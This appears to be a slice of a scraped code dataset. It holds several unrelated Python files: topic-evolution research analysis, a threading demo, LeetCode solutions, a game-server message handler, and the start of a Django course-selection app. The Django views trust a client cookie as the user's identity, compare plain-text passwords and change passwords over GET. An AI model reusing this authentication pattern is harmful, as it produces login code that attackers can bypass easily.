(ssim, mer, sdis, freq, time) = anisotropy_adjusted_res[fos]\n plot_all_metrics(time, ssim, mer, sdis, freq, fos, fit=True, normalized=False, cls_type='Inverted U-shape') # Inverted U-shape\n plot_3d_func(fos, results, FoS2Vec_path, cls_type='Inverted U-shape')\n \n\n#%%\n\"\"\"\n Experiments and results in Section 5.3\n Calculate others similarity & others distance\n\"\"\"\n\ndef calculate_centriod_dis(Centroid, fos_i, fos_j):\n \"\"\"计算不同fos质心的差距\"\"\"\n tmp = dict()\n Centroid_i = Centroid[fos_i] # 质心i\n Centroid_j = Centroid[fos_j] # 质心j\n start_year_i = min(Centroid_i.keys())\n start_year_j = min(Centroid_j.keys())\n end_year_i = max(Centroid_i.keys())\n end_year_j = max(Centroid_j.keys())\n start_year = max(start_year_i, start_year_j)\n end_year = 2018\n for year in range(start_year, end_year + 1):\n # 计算质心距离\n if year in Centroid[fos_i]:\n vecs_i_avg = Centroid[fos_i][year]\n else:\n vecs_i_avg = Centroid[fos_i][end_year_i]\n if year in Centroid[fos_j]:\n vecs_j_avg = Centroid[fos_j][year]\n else:\n vecs_j_avg = Centroid[fos_j][end_year_j]\n vecs_i_avg = torch.tensor(vecs_i_avg).float()\n vecs_j_avg = torch.tensor(vecs_j_avg).float()\n cos_ij = torch.cosine_similarity(vecs_i_avg, vecs_j_avg).numpy()[0]\n dis_ij = torch.dist(vecs_i_avg, vecs_j_avg).numpy()\n dis_ij = np.array([dis_ij])[0]\n \n cos_ij = np.array(cos_ij, dtype=np.float16)\n dis_ij = np.array(dis_ij, dtype=np.float16)\n tmp[year] = np.array([cos_ij, dis_ij])\n return tmp\n\n\ndef calculate_centriod_dis_MP(Centroid, cofos_list_i):\n tmp2 = dict()\n for name_ij in cofos_list_i:\n fos_i, fos_j = name_ij.split(\";\")\n tmp = calculate_centriod_dis(Centroid, int(fos_i), int(fos_j))\n tmp2[name_ij] = tmp\n return tmp2\n\n\ndef plot_intra_distance(ssim, osim, time, fos, xticks=[], ax1_yticks=[], ax2_yticks=[]):\n \n \"\"\"\n (ssim, time): self distance (inter similarity)\n (osim, time): intra similarity\n \"\"\"\n \n fig = plt.figure(figsize=(8, 6))\n plt.rcParams['savefig.dpi'] = 300\n plt.rcParams['figure.dpi'] = 300\n config = {\n \"font.family\" : \"Times New Roman\",\n \"font.size\" : 20\n }\n rcParams.update(config)\n plt.rcParams['axes.unicode_minus'] = False \n \n Y = [ssim, osim]\n C = [\"red\", \"blue\", \"green\", \"brown\"]\n S = [\"s\", \"o\", \"+\", \"p\"]\n Ylabel = [\"SSIM\", \"OSIM\"] # 类内相似性, 类间相似性\n\n ax1 = fig.add_subplot(111)\n ax1.plot(time, ssim, c='red', linewidth=1, linestyle='--', marker=\"s\", label=\"\")\n ax2 = plt.twinx()\n ax2.plot(time, osim, c='blue', linewidth=1, linestyle='--', marker=\"o\", label=\"\")\n \n ax1.set_ylabel(\"SSIM\", color='red')\n ax2.set_ylabel(\"OSIM\", color='blue')\n ax1.set_xlabel(\"Time\")\n ax1.legend(frameon=False, loc='upper left')\n ax2.legend(frameon=False, loc='upper right')\n plt.title(fos[:-4], fontsize=20, fontweight='bold')\n plt.tight_layout()\n \n # 坐标轴刻度\n ax1.yaxis.set_major_formatter(mtick.FormatStrFormatter('%.3f'))\n up_y = math.ceil(max(ssim) * 1000)\n down_y = math.floor(min(ssim) * 1000)\n yticks = np.linspace(down_y, up_y, 5) / 1000\n ax1.set_yticks(yticks)\n \n ax2.yaxis.set_major_formatter(mtick.FormatStrFormatter('%.3f'))\n up_y = math.ceil(max(osim) * 1000)\n down_y = math.floor(min(osim) * 1000)\n yticks = np.linspace(down_y, up_y, 5) / 1000\n ax2.set_yticks(yticks)\n \n if min(time) % 10 >= 5:\n down_x = min(time) // 10 * 10 + 5\n else:\n down_x = min(time) // 10 * 10\n up_x = 2025\n xticks = np.arange(down_x, up_x, 5)\n ax1.set_xticks(xticks)\n ax1.tick_params(axis='y',colors='red')\n ax2.tick_params(axis='y',colors='blue')\n\n\ndef results_for_analyze_evolutionary_trajectory_Step2():\n \"\"\"获取fos_i与fos_j之间的距离信息\"\"\"\n \n FoS2Vec_path = os.path.join(abs_file_path, \"FoS2Vec\")\n results = read_file(\"./temp/results_for_evolutionary_trajectory.pkl\")\n FoSs = list(results.keys())\n \n # 统一计算质心\n if not os.path.exists(\"./temp/Centroid.pkl\"):\n Centroid = dict()\n for fos in tqdm(FoSs):\n Centroid[fos] = dict()\n dic = read_file(os.path.join(FoS2Vec_path, fos))\n start_year = max(min(dic.keys()), 1990)\n end_year = min(max(dic.keys()), 2018)\n for year in range(start_year, end_year + 1):\n vecs = get_vec_func(dic, start_year, year)\n if len(vecs) < 10:\n continue\n else:\n vecs_avg = np.mean(vecs, axis=0, keepdims=True)\n if year not in Centroid[fos]:\n Centroid[fos][year] = vecs_avg\n save_file(Centroid, \"./temp/Centroid.pkl\")\n else:\n # 计算 fos_i 和 fos_j 逐年的质心的距离\n Centroid = read_file(\"./temp/Centroid.pkl\")\n \n # 给fos编号, 节约内存\n Centroid_ = dict()\n fos2idx = dict()\n idx2fos = dict()\n for i, fos in enumerate(Centroid):\n fos2idx[fos] = i\n idx2fos[i] = fos\n Centroid_[i] = Centroid[fos]\n del Centroid\n save_file(idx2fos, \"./temp/idx2fos.pkl\")\n save_file(fos2idx, \"./temp/fos2idx.pkl\")\n \n # 统计需要计算的总(fos_i, fos_j) pair\n results_cofos_dis = dict()\n for fos_i in tqdm(FoSs):\n for fos_j in FoSs:\n if fos_i == fos_j:\n continue\n name_ij = str(fos2idx[fos_i]) + \";\" + str(fos2idx[fos_j])\n name_ji = str(fos2idx[fos_j]) + \";\" + str(fos2idx[fos_i])\n if name_ij not in results_cofos_dis and name_ji not in results_cofos_dis:\n results_cofos_dis[name_ij] = dict()\n \n # 将上述总 (fos_j, fos_j) pair 划分成 100 块\n chunck_num = 100\n cofos_list = list(results_cofos_dis.keys())\n del results_cofos_dis\n start_c = 0\n end_c = 0\n c_size = math.ceil(len(cofos_list) / chunck_num)\n for c in tqdm(range(chunck_num)):\n end_c = min(start_c + c_size, len(cofos_list))\n cofos_list_c = cofos_list[start_c: end_c] # 取出一块多进程处理\n save_file(cofos_list_c, os.path.join(abs_file_path, \"FoS2FoS/cofos_list_c_{}.pkl\".format(c)))\n start_c = end_c\n del cofos_list\n \n # 每块 (fos_i, fos_j) pair 多进程计算质心距离 (cosine, Euclidean)\n for c in range(chunck_num):\n print(\"Processing {}\".format(c))\n start_time = time_lib.perf_counter()\n \n cofos_list_c = read_file(os.path.join(abs_file_path, \"FoS2FoS/cofos_list_c_{}.pkl\".format(c)))\n # 开始多进程\n total_size = len(cofos_list_c)\n mp_num = 7\n mp_size = math.ceil(total_size / mp_num)\n start_idx = 0\n end_idx = 0\n tmp3 = list()\n pool = multiprocessing.Pool(processes=mp_num) # 创建进程池\n for i in range(mp_num):\n end_idx = min(start_idx + mp_size, len(cofos_list_c))\n cofos_list_i = cofos_list_c[start_idx: end_idx]\n tmp3.append(pool.apply_async(calculate_centriod_dis_MP, (Centroid_, cofos_list_i,))) \n start_idx = end_idx\n pool.close()\n pool.join()\n # 获取结果\n results_cofos_dis = dict()\n for tmp3_i in tmp3:\n res = tmp3_i.get()\n for name_ij in res:\n results_cofos_dis[name_ij] = res[name_ij]\n save_file(results_cofos_dis, os.path.join(abs_file_path, \"FoS2FoS/results_cofos_dis_{}.pkl\".format(c)))\n end_time = time_lib.perf_counter()\n \n print(\"耗时: {}\".format(round(end_time - start_time)))\n \n # 清除中间文件\n for c in tqdm(range(chunck_num)):\n if os.path.exists(os.path.join(abs_file_path, \"FoS2FoS/cofos_list_c_{}.pkl\".format(c))):\n os.remove(os.path.join(abs_file_path, \"FoS2FoS/cofos_list_c_{}.pkl\".format(c)))\n \n # 稀疏矩阵储存 (逐年)\n row_num = len(idx2fos) \n for c in tqdm(range(chunck_num)):\n results_cofos_dis = read_file(os.path.join(abs_file_path, \"FoS2FoS/results_cofos_dis_{}.pkl\".format(c)))\n # 新增信息\n Matrixs = dict()\n for year in range(1990, 2018 + 1):\n Matrix = np.zeros((row_num, row_num), dtype=np.float16)\n Matrixs[year] = Matrix \n for name_ij in tqdm(results_cofos_dis):\n fos_i, fos_j = name_ij.split(\";\")\n fos_i = int(fos_i)\n fos_j = int(fos_j)\n for year in results_cofos_dis[name_ij]:\n Matrix = Matrixs[year]\n cos_ij, dis_ij = results_cofos_dis[name_ij][year] \n # Matrix[fos_i, fos_j] = cos_ij # *** OSIM ***\n Matrix[fos_i, fos_j] = dis_ij # *** ODIS ***\n # 补充\n for year in range(1990, 2018 + 1):\n Current_Matrix = Matrixs[year] # 非稀疏矩阵\n path_SMatrix = os.path.join(abs_file_path, \"FoS2SM/SM_{}.pkl\".format(year))\n if not os.path.exists(path_SMatrix):\n Current_SMatrix = csr_matrix(Current_Matrix) # 转换成稀疏矩阵\n save_file(Current_SMatrix, path_SMatrix)\n else:\n Former_SMatrix = read_file(path_SMatrix)\n Former_Matrix = csr_matrix(Former_SMatrix).toarray()\n Former_Matrix += Current_Matrix\n Former_SMatrix = csr_matrix(Former_Matrix)\n save_file(Former_SMatrix, path_SMatrix)\n \n \n # (2) 研究主题自距离(ssim) 与 主题与其它主题的质心距离\n idx2fos = read_file(\"./temp/idx2fos.pkl\")\n fos2idx = read_file(\"./temp/fos2idx.pkl\")\n results = read_file(\"./temp/results_for_evolutionary_trajectory.pkl\")\n ODIS_OSIM = dict()\n for fos in results:\n ODIS_OSIM[fos] = dict() \n for year in tqdm(range(1990, 2018 + 1)):\n Matrix = read_file(os.path.join(abs_file_path, \"FoS2SM/SM_{}.pkl\".format(year)))\n Matrix = csr_matrix(Matrix).toarray() # 是上三角矩阵\n Matrix = Matrix + Matrix.T # 转换成距离对称矩阵 \n for i in range(len(Matrix)): \n fos = idx2fos[i]\n ssim, mer, sdis, freq, time = results[fos]\n fos_beg_year = min(time)\n fos_end_year = max(time)\n if fos_beg_year <= year and year <= fos_end_year:\n Matrix_row_i = Matrix[i]\n denominator = max(np.sum(Matrix_row_i != 0), 1)\n numerator = np.sum(Matrix_row_i)\n cos_avg = numerator / denominator\n ODIS_OSIM[fos][year] = cos_avg\n # save_file(ODIS_OSIM, \"./temp/results_for_evolutionary_trajectory2.pkl\") # osim\n # save_file(ODIS_OSIM, \"./temp/results_for_evolutionary_trajectory3.pkl\") # odis\n \n \n # case study\n results = read_file(\"./temp/anisotropy_adjusted_res.pkl\")\n results2 = read_file(\"./temp/results_for_evolutionary_trajectory2.pkl\") # osim\n results3 = read_file(\"./temp/results_for_evolutionary_trajectory3.pkl\") # odis\n \n fos = list(results.keys())[1001] \n fos = \"semantic network.pkl\"\n ssim, mer, sdis, freq, time = results[fos] \n osim = results2[fos]\n osim = [osim[t] for t in time]\n plot_intra_distance(ssim, osim, time, fos)\n \n\n#%%\n\"\"\"\n Experiments and results in Section 5.3\n Conduct regression analysis with fixed time and entity effects\n\"\"\"\n\ndef calculate_metrics_pearsonr(Matrix, columns_name, title=\"\"):\n ''' 计算上述所有指标的相关系数 '''\n # pd dataframe\n Data = pd.DataFrame(Matrix)\n # Data = (Data - Data.min()) / (Data.max() - Data.min())\n # 计算 pearsonr\n corr_matrix = Data.corr()\n mask = np.triu(np.ones_like(corr_matrix, dtype=np.bool))\n corr = corr_matrix.copy()\n \n # 绘制热力图\n fig = plt.figure(figsize=(10, 8))\n plt.rcParams['savefig.dpi'] = 300\n plt.rcParams['figure.dpi'] = 300\n config = {\n \"font.family\" : \"Times New Roman\", # \n \"font.size\" : 12\n }\n rcParams.update(config)\n # SimHei 字体符号不正常显示\n plt.rcParams['axes.unicode_minus'] = False \n \n cmap = sns.diverging_palette(230, 0, 90, 60, as_cmap=True)\n sns.heatmap(corr, mask=mask, annot=True, fmt='.2f', cmap=cmap,\n vmin=-1, vmax=1, cbar_kws={'shrink': 1}, linewidths=5, square=True,\n xticklabels=columns_name, yticklabels=columns_name)\n plt.yticks(rotation=0) \n plt.title(title, fontsize=20)\n\n\ndef calculate_gini(freq_list):\n # 计算GINI-index 2023-4-7\n freq_list = np.array(freq_list)\n freq_ratio = freq_list / max(sum(freq_list), 1)\n gini = 1 - sum(freq_ratio ** 2) # gini系数, 越靠近0, 表示越纯\n return gini\n\n\ndef get_unique_num(aids, time1, time2):\n # 作者数目, 机构数目, 期刊数目 from time1 to time2\n unique_id = dict()\n for year in range(time1, time2 + 1):\n if year in aids:\n for aid in aids[year]:\n if aid not in unique_id:\n unique_id[aid] = 0\n unique_id[aid] += aids[year][aid]\n unique_num = len(unique_id)\n freq_list = [unique_id[Id] for Id in unique_id]\n gini = calculate_gini(freq_list)\n return unique_num, gini\n \n\ndef get_cc_num(ccs, time1, time2):\n # 引用次数\n cc_full_num = 0 \n cc_frac_num = 0\n for year in range(time1, time2 + 1):\n if year in ccs:\n cc_full_num += ccs[year][0]\n cc_frac_num += ccs[year][1]\n return cc_full_num, cc_frac_num\n\n\ndef get_freq_num(fids, time1, time2, fos):\n # 共现次数 (自身频率, 其余主题频率)\n self_freq = 0\n unique_co_fos = dict()\n for year in range(time1, time2 + 1):\n if year in fids:\n for fos_ in fids[year]:\n if fos_ == fos[:-4]:\n self_freq += fids[year][fos_]\n else:\n if fos_ not in unique_co_fos:\n unique_co_fos[fos_] = fids[year][fos_]\n else:\n unique_co_fos[fos_] += fids[year][fos_]\n \n unique_fos_num = len(unique_co_fos.keys()) # 共现主题种类\n other_freq_list = list() # 共现主题频次\n for fos_ in unique_co_fos:\n other_freq_list.append(unique_co_fos[fos_])\n other_freq_sum = sum(other_freq_list)\n gini = calculate_gini(other_freq_list) # gini index \n return self_freq, other_freq_sum, unique_fos_num, gini \n\n\ndef get_inter_metrics(results, time1, time2, fos):\n \"\"\"inter-class\"\"\"\n ssim, mer, sdis, freq, time = results[fos]\n tmp = dict()\n for i, t in enumerate(time):\n tmp[t] = (ssim[i], mer[i], sdis[i])\n \n max_time = time[-1]\n time2_ = min(time2, max_time)\n ssim_t, mer_t, sids_t = tmp[time2_]\n time_gap = time2_ - time[0] + 1\n return ssim_t, mer_t, sids_t, time_gap\n\n\ndef get_intra_metrics(results2, time1, time2, fos): \n \"\"\"intra-class\"\"\"\n max_time = max(results2[fos].keys())\n time2_ = min(time2, max_time)\n osim_t = results2[fos][time2_]\n return osim_t\n \n\ndef results_for_linear_regression_analysis(): \n \"\"\" experiments and results in Section 4.3 \"\"\"\n # 1990-2018年逐年ssim, mer, sdis (Total FoS Freq >= 100)\n path_anisotropy_adjusted_res =\"./temp/anisotropy_adjusted_res.pkl\"\n # results = read_file(\"./temp/results_for_evolutionary_trajectory.pkl\")\n results = read_file(path_anisotropy_adjusted_res)\n results2 = read_file(\"./temp/results_for_evolutionary_trajectory2.pkl\") # OSIM\n results3 = read_file(\"./temp/results_for_evolutionary_trajectory3.pkl\") # ODIS\n\n # 准备线性回归数据\n begyear_all = 1990\n endyear_all = 2018\n data = dict()\n for fos in tqdm(results):\n data_fos = list()\n \n # 读取词向量信息\n # vec_path = os.path.join(absolute_path, \"FoS2Vec/{}\".format(fos))\n # vecs = read_file(vec_path)\n # 读取作者信息\n aid_path = os.path.join(abs_file_path, \"FoS2Info/{}/{}\".format(\"FoS2Aid\", fos))\n aids = read_file(aid_path)\n # 读取机构信息\n oid_path = os.path.join(abs_file_path, \"FoS2Info/{}/{}\".format(\"FoS2Oid\", fos))\n oids = read_file(oid_path)\n # 读取期刊信息\n vid_path = os.path.join(abs_file_path, \"FoS2Info/{}/{}\".format(\"FoS2Vid\", fos))\n vids = read_file(vid_path)\n # 读取引用信息\n cc_path = os.path.join(abs_file_path, \"FoS2Info/{}/{}\".format(\"FoS2CC\", fos))\n if os.path.exists(cc_path):\n ccs = read_file(cc_path)\n else:\n ccs = dict()\n # 读取共现信息 (FoS)\n fid_path = os.path.join(abs_file_path, \"FoS2Info/{}/{}\".format(\"FoS2Fid\", fos))\n fids = read_file(fid_path)\n \n # 确定序列时刻范围:[begyear, endyear] (该时段已计算fos的ssim, mer, sdis指标)\n _, _, _, _, time = results[fos]\n begyear_fos = min(time)\n endyear_fos = max(time)\n begyear = max(begyear_all, begyear_fos) # 保证已计算 ssim, mer, sdis\n endyear = min(endyear_all, endyear_fos) # 保证已计算 ssim, mer, sdis\n for year in range(begyear, endyear + 1):\n # 控制变量\n aids_num, aids_gini = get_unique_num(aids, year, year) # 当年的作者数\n oids_num, oids_gini = get_unique_num(oids, year, year) # 当年的机构数\n vids_num, vids_gini = get_unique_num(vids, year, year) # 当年的期刊数\n cc_full_num, cc_frac_num = get_cc_num(ccs, year, year) # 当年的引用数\n fos_freq, cofos_freq, cofos_num, cofos_gini = get_freq_num(fids, year, year, fos) # 当年的采纳数\n # 因变量 和 自变量\n ssim_t, mer_t, sdis_t, time_gap = get_inter_metrics(results, year, year, fos) # 因变量\n osim_t = get_intra_metrics(results2, year, year, fos) # 自变量 \n odis_t = get_intra_metrics(results3, year, year, fos)\n \n data_fos.append([ssim_t, mer_t, sdis_t, # 因变量\n osim_t, 1 / odis_t, # 自变量\n fos, time_gap, year, # 个体效应, 时间效应 (相对时间, 绝对时间)\n aids_num, oids_num, vids_num, # 控制变量\n aids_gini, oids_gini, vids_gini, # 控制变量 \n fos_freq, cofos_freq, cofos_num, cofos_gini, # 控制变量\n cc_full_num, cc_frac_num]) # 控制变量\n data[fos] = data_fos\n save_file(data, \"./temp/data_reg.pkl\")\n \n \n # (2) 开始线性回归\n data_reg = read_file(\"./temp/data_reg.pkl\")\n # 准备回归数据\n Examples = data_reg\n data = list()\n for fos in Examples:\n data += data_reg[fos]\n data = pd.DataFrame(data)\n data.columns = [\"SSIM\", \"MER\", \"SDIS\",\n \"OSIM\", r\"ODIS\",\n \"FoS\", \"RT\", \"T\",\n \"N_A\", \"N_O\", \"N_J\",\n \"G_A\", \"G_O\", \"G_J\", \n \"Freq\", \"CoFreq\", \"N_Co\", \"G_Co\",\n \"CC_full\", \"CC_frac\"]\n RT = pd.Categorical(data.RT)\n data = data.set_index(['FoS', \"RT\"], drop=True)\n data['RT'] = RT\n data['OSIM2'] = data[\"OSIM\"] ** 2\n data[\"LogFreq\"] = np.log(np.maximum(data[\"Freq\"], 1e-3)) # log 采纳频次 (论文数)\n data[\"LogCC\"] = np.log(np.maximum(data[\"CC_full\"], 1e-3)) # log 被引数\n \n # 线性相关性检查\n columns_name = [r\"$SSIM$\", r\"$MEV$\", r\"$SDIS$\", \n r\"$OSIM$\", r\"$ODIS$\", \n r\"$N^S$\", r\"$N^{AI}$\", r\"$N^{JC}$\",\n r\"$N^{F}$\", r\"$N^{CF}$\", r\"$N^{UCF}}$\",\n r\"$N^{CC}$\",\n r\"$G^{S}$\", r\"$G^{AI}$\", r\"$G^{JC}$\", r\"$G^{CF}$\"]\n data_corr = data[[\"SSIM\", \"MER\", \"SDIS\", \n \"OSIM\", r\"ODIS\",\n \"N_A\", \"N_O\", \"N_J\",\n \"Freq\", \"CoFreq\", \"N_Co\", \n \"CC_full\",\n \"G_A\", \"G_O\", \"G_J\", \"G_Co\"]]\n calculate_metrics_pearsonr(data_corr, columns_name)\n \n # data_corr = data[[\"LogFreq\", \"LogCC\", \"Freq\", \"CC_full\"]]\n # corr_matrix = data_corr.corr()\n # print(corr_matrix)\n # variance_inflation_factor(data_corr.values, 1)\n \n # Table 4\n # 固定效应 - 双向效应\n exog_vars = ['OSIM']\n exog_vars = ['OSIM', \"LogFreq\"]\n exog_vars = ['OSIM', \"LogFreq\", \"LogCC\"]\n exog_vars = ['OSIM', \"LogFreq\", \"LogCC\", \"G_A\"]\n exog_vars = ['OSIM', \"LogFreq\", \"LogCC\", \"G_O\"]\n exog_vars = ['OSIM', \"LogFreq\", \"LogCC\", \"G_J\"]\n exog_vars = ['OSIM', \"LogFreq\", \"LogCC\", \"G_Co\"]\n exog_vars = ['OSIM', \"LogFreq\", \"LogCC\", \"G_A\", \"G_O\"]\n exog_vars = ['OSIM', \"LogFreq\", \"LogCC\", \"G_A\", \"G_O\", \"G_J\"]\n exog_vars = ['OSIM', \"LogFreq\", \"LogCC\", \"G_A\", \"G_O\", \"G_J\",\"G_Co\"]\n \n exog = sm.add_constant(data[exog_vars])\n mod = PanelOLS(data.SSIM, exog, entity_effects=True, time_effects=True)\n fe_re_res = mod.fit(cov_type='clustered', cluster_entity=True, cluster_time=True)\n fe_re_pred = fe_re_res.predict()\n print(fe_re_res)\n \n # Table 5\n # 固定效应 - 双向效应\n exog_vars = ['ODIS']\n exog_vars = ['ODIS', \"LogFreq\"]\n exog_vars = ['ODIS', \"LogFreq\", \"LogCC\"]\n exog_vars = ['ODIS', \"LogFreq\", \"LogCC\", \"G_A\"]\n exog_vars = ['ODIS', \"LogFreq\", \"LogCC\", \"G_O\"]\n exog_vars = ['ODIS', \"LogFreq\", \"LogCC\", \"G_J\"]\n exog_vars = ['ODIS', \"LogFreq\", \"LogCC\", \"G_Co\"]\n exog_vars = ['ODIS', \"LogFreq\", \"LogCC\", \"G_A\", \"G_O\"]\n exog_vars = ['ODIS', \"LogFreq\", \"LogCC\", \"G_A\", \"G_O\", \"G_J\"]\n exog_vars = ['ODIS', \"LogFreq\", \"LogCC\", \"G_A\", \"G_O\", \"G_J\",\"G_Co\"]\n \n exog = sm.add_constant(data[exog_vars])\n mod = PanelOLS(data[\"SDIS\"], exog, entity_effects=True, time_effects=True)\n fe_re_res = mod.fit(cov_type='clustered', cluster_entity=True, cluster_time=True)\n fe_re_pred = fe_re_res.predict()\n print(fe_re_res)\n \n # 绘图\n plt_X = list()\n plt_Y_actual = list()\n plt_Y_pred = list()\n for fos in tqdm(Examples):\n plt_x = data.loc[fos]['OSIM']\n plt_y_acutal = data.loc[fos]['SSIM']\n plt_y_pred = fe_re_pred.loc[fos]['fitted_values']\n plt_X.append(plt_x)\n plt_Y_actual.append(plt_y_acutal)\n plt_Y_pred.append(plt_y_pred)\n plt_X = np.concatenate(plt_X)\n plt_Y_actual = np.concatenate(plt_Y_actual)\n plt_Y_pred = np.concatenate(plt_Y_pred)\n \n fig = plt.figure(figsize=(8, 6))\n plt.rcParams['savefig.dpi'] = 300\n plt.rcParams['figure.dpi'] = 300\n config = {\n \"font.family\" : \"Times New Roman\", # \n \"font.size\" : 20\n }\n rcParams.update(config)\n # 散点图\n plt.scatter(plt_X, plt_Y_actual, c='gray', alpha=0.1, s=1)\n plt.scatter(plt_X, plt_Y_pred, c='red', alpha=0.1, s=1, marker=\"o\")\n plt.ylabel(\"$SSIM$\")\n plt.xlabel(\"$OSIM$\")\n plt.yticks(np.arange(0.1, 0.6, 0.1))\n plt.xticks(np.arange(-0.3, 0.3, 0.1))","repo_name":"WannaLearning/Evolutions-of-Semantic-Consistency-in-Research-Topic-via-Contextualized-Word-Embedding","sub_path":"TopicEvolution_BERTVecAnalysis/Code/ExprimentsAndResults.py","file_name":"ExprimentsAndResults.py","file_ext":"py","file_size_in_byte":64320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13611462725","text":"#coding=utf-8\n\nimport queue\nimport threading\nimport time\n\nclass threadingQueue(threading.Thread):\n def __init__(self,name,q):\n threading.Thread.__init__(self);\n self.name=name;\n self.q=q;\n def run(self):\n while(True):\n #time.sleep(5);\n #print(\"%s threading start \\n\"%self.name);\n a=self.q.get();\n print('------',a,'-----\\n');\n self.q.task_done();\n \n\nif __name__=='__main__':\n data=[1,2,3,4,5,6,7,8,9,0];\n qTmp=queue.Queue();\n for i in data:\n qTmp.put(i);\n for j in range(3):\n t=threadingQueue(str(j),qTmp);\n t.setDaemon(True);\n t.start();\n qTmp.join();\n print('All Done !');","repo_name":"wyude/test","sub_path":"test/ThreadingQueue.py","file_name":"ThreadingQueue.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10790513525","text":"# Time: O(nlogn)\n# Space: O(n)\n\nimport collections\n\n\nclass UnionFind(object):\n def __init__(self, n):\n self.set = range(n)\n\n def find_set(self, x):\n if self.set[x] != x:\n self.set[x] = self.find_set(self.set[x]) # path compression.\n return self.set[x]\n\n def union_set(self, x, y):\n x_root, y_root = map(self.find_set, (x, y))\n if x_root == y_root:\n return False\n self.set[max(x_root, y_root)] = min(x_root, y_root)\n return True\n\n\nclass Solution(object):\n def smallestStringWithSwaps(self, s, pairs):\n \"\"\"\n :type s: str\n :type pairs: List[List[int]]\n :rtype: str\n \"\"\"\n union_find = UnionFind(len(s))\n for x,y in pairs: \n union_find.union_set(x, y)\n components = collections.defaultdict(list)\n for i in xrange(len(s)): \n components[union_find.find_set(i)].append(s[i])\n for i in components.iterkeys(): \n components[i].sort(reverse=True)\n result = []\n for i in xrange(len(s)): \n result.append(components[union_find.find_set(i)].pop())\n return \"\".join(result)\n\n\n# Time: O(nlogn)\n# Space: O(n)\nimport itertools\nclass Solution2(object):\n def smallestStringWithSwaps(self, s, pairs):\n \"\"\"\n :type s: str\n :type pairs: List[List[int]]\n :rtype: str\n \"\"\"\n def dfs(i, adj, lookup, component):\n lookup.add(i)\n component.append(i)\n for j in adj[i]:\n if j in lookup:\n continue\n dfs(j, adj, lookup, component)\n \n adj = collections.defaultdict(list)\n for i, j in pairs:\n adj[i].append(j)\n adj[j].append(i)\n lookup = set()\n result = list(s)\n for i in xrange(len(s)):\n if i in lookup:\n continue\n component = []\n dfs(i, adj, lookup, component)\n component.sort()\n chars = sorted(result[k] for k in component)\n for comp, char in itertools.izip(component, chars):\n result[comp] = char\n return \"\".join(result)\n","repo_name":"kamyu104/LeetCode-Solutions","sub_path":"Python/smallest-string-with-swaps.py","file_name":"smallest-string-with-swaps.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":4314,"dataset":"github-code","pt":"40"} +{"seq_id":"19734163655","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:\n \n if not headA or not headB:\n return None\n \n curr1, curr2 = headA, headB\n while curr1 and curr2 and curr1 != curr2:\n curr1 = curr1.next\n curr2 = curr2.next\n if curr1 == curr2:\n return curr1\n if not curr1:\n curr1 = headB\n if not curr2:\n curr2 = headA\n \n return curr1\n","repo_name":"palashsharma891/LeetCode-Learn-Cards","sub_path":"2. Linked List/2. Two Pointer Technique/Intersection of Two Linked Lists.py","file_name":"Intersection of Two Linked Lists.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1261745506","text":"from ByteStream.Reader import Reader\nfrom Protocol.Messages.Server.TeamMessage import TeamMessage\nfrom Logic.Home.LogicEventData import LogicEventData\n\nclass TeamCreateMessage(Reader):\n def __init__(self, client, player, initial_bytes):\n super().__init__(initial_bytes)\n self.player = player\n self.client = client\n\n def decode(self):\n self.map_slot = self.readVInt()\n self.map_id = self.readVInt()\n self.room_type = self.readVInt()\n\n def process(self, db):\n if self.map_slot != -64:\n self.player.map_id = LogicEventData.events[self.map_slot - 1]['ID']\n else:\n self.player.map_id = 7\n\n TeamMessage(self.client, self.player).send()","repo_name":"PhoenixFire6934/Classic-Brawl","sub_path":"Protocol/Messages/Client/TeamCreateMessage.py","file_name":"TeamCreateMessage.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":109,"dataset":"github-code","pt":"40"} +{"seq_id":"3185802823","text":"#encoding=utf-8\nfrom django.shortcuts import render\n\nfrom django.http import HttpResponse\nfrom .models import Users , Userinfo, Courseinfo, Teacherinfo, TeacherCourse, StudentCourse, Department_College, Classtime, \\\n Classroom, Params\nfrom django.shortcuts import redirect\nimport json\nfrom urllib.parse import unquote\n\n# Create your views here.\n\ndef homepage(request):\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n if cook == None:\n return render(request, 'login.html')\n user = Users.objects.get(username = cook)\n if user.customertype == 0:\n return render(request, 'homepage.html')\n elif user.customertype == 1:\n return render(request, 'homepage_t.html')\n\ndef selectsubject(request):\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n if cook == None:\n return render(request, 'login.html')\n return render(request, 'selectsubject.html')\n\ndef modifypwd(request):\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n if cook == None:\n return render(request, 'login.html')\n return render(request, 'modifypwd.html')\n\ndef do_modifypwd(request):\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n if cook == None:\n return render(request, 'login.html')\n username = request.session.get('username')\n old_password = request.GET.get('old_password')\n new_password = request.GET.get('new_password')\n try:\n account = Users.objects.get(username=username)\n except:\n return HttpResponse('用户名密码不存在。')\n if account.password != old_password:\n return HttpResponse('原密码输入错误。')\n elif old_password == new_password:\n return HttpResponse('原密码和新密码不能相同。')\n else:\n Users.objects.filter(username=username).update(password=new_password) # update可多条\n return HttpResponse('密码修改成功!')\n\n\n\ndef studentinfo(request):\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n if cook == None:\n return render(request, 'login.html')\n user = Users.objects.get(username = cook)\n if user.customertype == 0:\n userinfo = Userinfo.objects.get(user_username=cook) # update可多条\n dep = Department_College.objects.get(departmentnumber=userinfo.user_department)\n userinfo.user_department = dep.departmentname\n userinfo.user_college = dep.collegename\n return render(request, 'studentinfo.html', {'userinfo':userinfo})\n elif user.customertype == 1:\n userinfo = Teacherinfo.objects.get(teacher_username=cook)\n dep = Department_College.objects.get(departmentnumber=userinfo.teacher_faculty)\n userinfo.teacher_faculty = dep.departmentname + dep.collegename\n return render(request, 